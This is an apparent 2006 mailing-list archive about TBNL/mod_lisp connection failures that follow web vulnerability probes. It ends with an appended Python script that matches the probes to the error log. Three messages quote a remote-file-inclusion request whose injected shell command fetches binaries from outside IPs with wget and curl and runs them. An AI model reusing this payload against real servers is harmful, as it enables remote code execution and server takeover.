From xach at xach.com Wed Apr 5 13:47:11 2006
From: xach at xach.com (Zach Beane)
Date: Wed, 5 Apr 2006 09:47:11 -0400
Subject: [tbnl-devel] tbnl/mod_lisp disconnection?
Message-ID: <20060405134711.GT6306@xach.com>

Every now and then I get hit by a sudden probe of various web script
vulnerabilities. The requests look like this:

  POST /xmlrpc/xmlrpc.php
  POST /blogs/xmlsrv/xmlrpc.php
  GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo|

After these things happen, the connection between mod_lisp and tbnl
starts to fail with this message in the apache logs:

  [Wed Apr 05 08:19:50 2006] [error] (70014)End of file found: error reading from Lisp
  [Wed Apr 05 08:19:51 2006] [error] (70014)End of file found: error reading from Lisp

Making requests to the website results in a 500 Internal Server Error.

I have looked at the listener object when this happens, and it seems
to have 10 workers. After a few more requests (all 500 errors), the
worker count drops down, and then suddenly things start working
normally again.

What might be happening with the connection in this situation? Is
there anything in the listener object I can inspect to discover why
the mod_lisp connection is getting EOF?

Zach

From edi at agharta.de Fri Apr 21 21:05:27 2006
From: edi at agharta.de (Edi Weitz)
Date: Fri, 21 Apr 2006 23:05:27 +0200
Subject: [tbnl-devel] tbnl/mod_lisp disconnection?
In-Reply-To: <20060405134711.GT6306@xach.com> (Zach Beane's message of "Wed, 5 Apr 2006 09:47:11 -0400")
References: <20060405134711.GT6306@xach.com>
Message-ID:

Hi Zach!

On Wed, 5 Apr 2006 09:47:11 -0400, Zach Beane wrote:

> Every now and then I get hit by a sudden probe of various web script
> vulnerabilities. The requests look like this:
>
>   POST /xmlrpc/xmlrpc.php
>   POST /blogs/xmlsrv/xmlrpc.php
>   GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo|
>
> After these things happen, the connection between mod_lisp and tbnl
> starts to fail with this message in the apache logs:
>
>   [Wed Apr 05 08:19:50 2006] [error] (70014)End of file found: error reading from Lisp
>   [Wed Apr 05 08:19:51 2006] [error] (70014)End of file found: error reading from Lisp
>
> Making requests to the website results in a 500 Internal Server Error.
>
> I have looked at the listener object when this happens, and it seems
> to have 10 workers. After a few more requests (all 500 errors), the
> worker count drops down, and then suddenly things start working
> normally again.
>
> What might be happening with the connection in this situation? Is
> there anything in the listener object I can inspect to discover why
> the mod_lisp connection is getting EOF?

Sorry for the loooooong delay. I'm /really/ busy... :)

Have you made any progress with this? I've tried to reproduce it (LWL
and Apache 2) but everything worked fine. Which Lisp are you using?

ATM I don't really have an idea how to tackle this. Sometimes, when I
was really desperate, I've hacked the mod_lisp C code to debug
problems like this one, but that isn't fun. Actually, that was one of
the reasons I wrote Hunchentoot...

I'm afraid I can't be more helpful right now.

Cheers,
Edi.

From xach at xach.com Mon Apr 24 14:01:33 2006
From: xach at xach.com (Zach Beane)
Date: Mon, 24 Apr 2006 10:01:33 -0400
Subject: [tbnl-devel] tbnl/mod_lisp disconnection?
In-Reply-To:
References: <20060405134711.GT6306@xach.com>
Message-ID: <20060424140133.GT6686@xach.com>

On Fri, Apr 21, 2006 at 11:05:27PM +0200, Edi Weitz wrote:
> Hi Zach!
>
> On Wed, 5 Apr 2006 09:47:11 -0400, Zach Beane wrote:
>
> > Every now and then I get hit by a sudden probe of various web script
> > vulnerabilities. The requests look like this:
> >
> >   POST /xmlrpc/xmlrpc.php
> >   POST /blogs/xmlsrv/xmlrpc.php
> >   GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo|
> >
> > After these things happen, the connection between mod_lisp and tbnl
> > starts to fail with this message in the apache logs:
> >
> >   [Wed Apr 05 08:19:50 2006] [error] (70014)End of file found: error reading from Lisp
> >   [Wed Apr 05 08:19:51 2006] [error] (70014)End of file found: error reading from Lisp
> >
> > Making requests to the website results in a 500 Internal Server Error.
> >
> > I have looked at the listener object when this happens, and it seems
> > to have 10 workers. After a few more requests (all 500 errors), the
> > worker count drops down, and then suddenly things start working
> > normally again.
> >
> > What might be happening with the connection in this situation? Is
> > there anything in the listener object I can inspect to discover why
> > the mod_lisp connection is getting EOF?
>
> Sorry for the loooooong delay. I'm /really/ busy... :)
>
> Have you made any progress with this? I've tried to reproduce it (LWL
> and Apache 2) but everything worked fine. Which Lisp are you using?

I am using SBCL. I can't reproduce it either; it only seems to happen
after that particular style of attack.

On the other hand, I recently announced a new toy
(http://wigflip.com/saywhat/) and it got a few thousand visitors in a
short period of time. Things wedged a few times in a completely
different style, but again I am unable to reproduce, which makes
troubleshooting very difficult.

> ATM I don't really have an idea how to tackle this. Sometimes, when I
> was really desperate, I've hacked the mod_lisp C code to debug
> problems like this one, but that isn't fun. Actually, that was one of
> the reasons I wrote Hunchentoot...

I'm thinking of going in a similar direction.

Zach

From edi at agharta.de Tue Apr 25 20:00:33 2006
From: edi at agharta.de (Edi Weitz)
Date: Tue, 25 Apr 2006 22:00:33 +0200
Subject: [tbnl-devel] New version 0.9.8
Message-ID:

ChangeLog:

Version 0.9.8
2006-04-25
For mod_lisp, Lisp-Content-Length header must be sent after Content-Length header

Download:

Cheers,
Edi.

From stesch at no-spoon.de Sun Apr 30 13:21:51 2006
From: stesch at no-spoon.de (Stefan Scholl)
Date: Sun, 30 Apr 2006 15:21:51 +0200
Subject: [tbnl-devel] tbnl freeze
In-Reply-To: <7CB63559-7190-47EC-B242-7A3F9ABD13DB@gmail.com>
References: <7CB63559-7190-47EC-B242-7A3F9ABD13DB@gmail.com>
Message-ID: <20060430132151.GL13092@parsec.no-spoon.de>

On 2005-08-09 00:01:33, Steve Huffman wrote:
> I'm working on reddit.com, which uses TBNL as its web framework. For

OK, say, what was your solution to this problem? :-)
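
Added example, not part of any message in this archive: one way to check the observation in the "tbnl/mod_lisp disconnection?" thread, that the mod_lisp EOF errors follow the probe requests, by correlating probe hits in the access log with the error-log entries. The log lines are constructed samples, the access log is assumed to be in Common Log Format with both logs in the same local time zone, and all function names are hypothetical.

```python
import re
from datetime import datetime, timedelta

# Constructed sample logs (not from the thread); addresses are documentation ranges.
ACCESS_LOG = """\
192.0.2.7 - - [05/Apr/2006:08:19:48 -0400] "POST /xmlrpc/xmlrpc.php HTTP/1.0" 404 210
192.0.2.7 - - [05/Apr/2006:08:19:49 -0400] "GET /index.php?option=com_content&mosConfig_absolute_path=http://example.invalid/cmd.txt? HTTP/1.0" 404 208
198.51.100.3 - - [05/Apr/2006:08:19:50 -0400] "GET /saywhat/ HTTP/1.1" 500 530
198.51.100.3 - - [05/Apr/2006:09:30:00 -0400] "GET /saywhat/ HTTP/1.1" 200 4100
"""
ERROR_LOG = """\
[Wed Apr 05 08:19:50 2006] [error] (70014)End of file found: error reading from Lisp
[Wed Apr 05 08:19:51 2006] [error] (70014)End of file found: error reading from Lisp
[Wed Apr 05 11:02:13 2006] [error] (70014)End of file found: error reading from Lisp
"""

# Probe signatures taken from the requests quoted in the thread:
# POSTs to xmlrpc.php, and a remote URL passed as mosConfig_absolute_path.
PROBE = re.compile(r'"(?:POST \S*xmlrpc\.php|GET \S*mosConfig_absolute_path=(?:https?|ftp)(?::|%3a)//)', re.I)
ACCESS_TS = re.compile(r'\[(\d{2}/\w{3}/\d{4}:\d{2}:\d{2}:\d{2}) [+-]\d{4}\]')
ERROR_LINE = re.compile(r'^\[(\w{3} \w{3} \d{2} \d{2}:\d{2}:\d{2} \d{4})\] \[error\] .*error reading from Lisp')

def probe_times(access_log):
    """Local timestamps of access-log lines that match a probe signature."""
    out = []
    for line in access_log.splitlines():
        m = ACCESS_TS.search(line)
        if m and PROBE.search(line):
            out.append(datetime.strptime(m.group(1), "%d/%b/%Y:%H:%M:%S"))
    return out

def eof_times(error_log):
    """Local timestamps of 'error reading from Lisp' entries in the error log."""
    out = []
    for line in error_log.splitlines():
        m = ERROR_LINE.match(line)
        if m:
            out.append(datetime.strptime(m.group(1), "%a %b %d %H:%M:%S %Y"))
    return out

def correlate(access_log, error_log, window=timedelta(seconds=60)):
    """Split EOF errors into (near_probe, unexplained) by time since a probe hit."""
    probes = probe_times(access_log)
    near, other = [], []
    for t in eof_times(error_log):
        hit = any(timedelta(0) <= t - p <= window for p in probes)
        (near if hit else other).append(t)
    return near, other
```

EOF errors left in the second list occurred with no probe in the preceding window, which points to a cause other than the probes, such as the load-related wedging mentioned later in the thread.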